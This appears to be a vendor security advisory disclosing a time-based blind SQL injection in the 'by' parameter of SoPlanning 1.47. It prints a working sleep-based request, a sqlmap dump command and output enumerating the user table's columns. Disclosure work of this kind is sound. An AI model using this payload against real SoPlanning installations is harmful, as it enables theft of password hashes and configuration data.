Time-based Blind SQL Injection – SoPlanning 

Researchers:

Nour Alomary

Background

SQL Injection (SQLi) is a vulnerability whereby an attacker alters the intended logic of an SQL command. To do this they tamper with the original SQL query through user controllable input fields.

As a result, the attacker may be able to access, modify and delete stored data, thus compromising its confidentiality, integrity and availability.
Depending on the underlying database system it may be possible to read or write files and/or execute commands on the operating system. In these situations, the impact migrates from the database to the supporting infrastructure and would potentially enable onward attacks to occur against neighbouring systems.

SQL Injection is a common vulnerability and is often the root cause of major data breaches.

Details
SoPlanning version 1.47.00 was vulnerable to a time-based blind SQL Injection vulnerability. This allowed an authenticated user to extract information from the application database and included configuration data as well as password hashes.

The following was the request made to the tasks page and highlighted below is the vulnerable ‘by’ parameter:

				
					GET 
/soplanning/www/taches.php?order=nom_personne&by=ASC%2c(select*from(select(sleep(20)))a) HTTP/1.1
Host: 192.168.0.88 Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.0.88/soplanning/www/taches.php 
Accept-Encoding: gzip, deflate 
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 
Cookie: dateDebut=03/09/2020; dateFin=03/11/2020; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; soplanningplanning_=r22g78taga3ok7tg3d5l03434n; baseLigne=users; baseColonne=jours 
Connection: close
				
			

Visiting the URL above when authenticated resulted in a twenty second delay from the server. Altering the number from “20” to “5” reduced the delay to five seconds. This was sufficient proof that an SQL injection vulnerability existed. An attacker can manipulate the logic from this point to extract data.

SQLMAP was used to automate this attack. The following shows the command that was executed while column names were enumerated:

				
					/sqlmap-dev$ python sqlmap.py -r taskRequest.txt --level=5 --risk=3 -p by --proxy="http://127.0.0.1:8080" --dbms=mysql -D soplanning -T planning_user --dump 

[...]

Parameter: by (GET) 
    Type: time-based blind 
    Title: MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause 
    Payload: order=nom_personne&by=ASC,(SELECT (CASE WHEN (8593=8593) THEN SLEEP(5) ELSE 8593 END)) 
--- 
[18:26:46] [INFO] the back-end DBMS is MySQL 
[18:26:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions web application technology: PHP 7.4.9, Apache 2.4.46 back-end DBMS: MySQL >= 5.0.12 
[18:26:47] [INFO] fetching columns for table 'planning_user' in database 'soplanning' 

[...] 

[18:27:14] [INFO] retrieved: adresse 
[18:28:04] [INFO] retrieved: cle 
[18:28:29] [INFO] retrieved: commentaire [18:29:52] [INFO] retrieved: couleur 
[18:30:52] [INFO] retrieved: da 
[18:31:17] [ERROR] invalid character detected. retrying.. 
[18:31:17] [WARNING] increasing time delay to 3 seconds te_creation 
[18:33:25] [INFO] retrieved: date_dernier_login 
[18:37:04] [INFO] retrieved: date_modif 
[18:39:03] [INFO] retrieved: droits 
[18:40:15] [INFO] retrieved: email 
[18:41:05] [INFO] retrieved: login 
[18:42:09] [INFO] retrieved: login_actif 
[18:44:22] [INFO] retrieved: metier 
[18:45:26] [INFO] retrieved: mobile 
[18:46:32] [INFO] retrieved: nom 
[18:47:14] [INFO] retrieved: notifications 
[18:49:39] [INFO] retrieved: passwor 
[18:51:08] [INFO] adjusting time delay to 2 seconds due to good response times
[...]
				
			

The highlighted parts demonstrate that:

⎯ The backend was MySQL >= 5.0.12; and
⎯ Listed the column names for the “planning_user” table in the “soplanning” database.

This was sufficient to demonstrate that data extraction was possible. Additional impacts such as file reading/writing, and OS command execution would be dependent on the setup of the database. Those would be different for each customer deployment of SoPlanning.

Risk Analysis

Risk Category: High
CVSSv2: 8.1 AV:N/AC:L/Au:S/C:C/I:C/A:N/E:F
CVSSv3: 
9.6 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Affected item

SOPlannning version 1.47 and lower

Recommendation

Update to SOPlannning Version 1.48

How can we support you?

Contact our team today to find out how we can help support your organization.